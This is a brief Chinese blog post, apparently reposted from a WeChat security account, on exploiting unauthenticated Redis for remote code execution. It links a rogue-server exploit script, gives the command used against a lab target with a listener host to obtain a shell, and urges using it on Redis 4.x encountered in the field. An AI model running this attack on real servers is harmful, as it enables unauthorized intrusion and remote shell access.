01
—
Redis-RCE
Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。
Redis在默认情况下,会绑定6379这个端口,如果服务器没有采用限制IP访问或在防火墙做策略,就会将Redis服务暴露在公网上,并且在没有设置密码认证的情况下(既然有密码也可进行爆破),会导致用户未授权访问,可能导致,SSH远程登录,写入webshell,交互式shell,反弹shell等操作
影响版本:Redis 2.x,3.x,4.x,5.x
小编这里找到一个改进过后的RCE脚本:
https:
//github.com/Testzero-wz/Awsome-Redis-Rogue-Server
靶机(vulhub)启动redis后,直接上命令
python3
redis_rogue_server
.py
-rhost
192
.168
.x
.x
-lhost
192
.168
.x
.x
-v
输入
i
,获取
shell
挺好使的脚本,下回遇到redis 4.x的版本,直接打。
原文始发于微信公众号(道玄网安驿站):Redis未授权访问利用RCE脚本
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论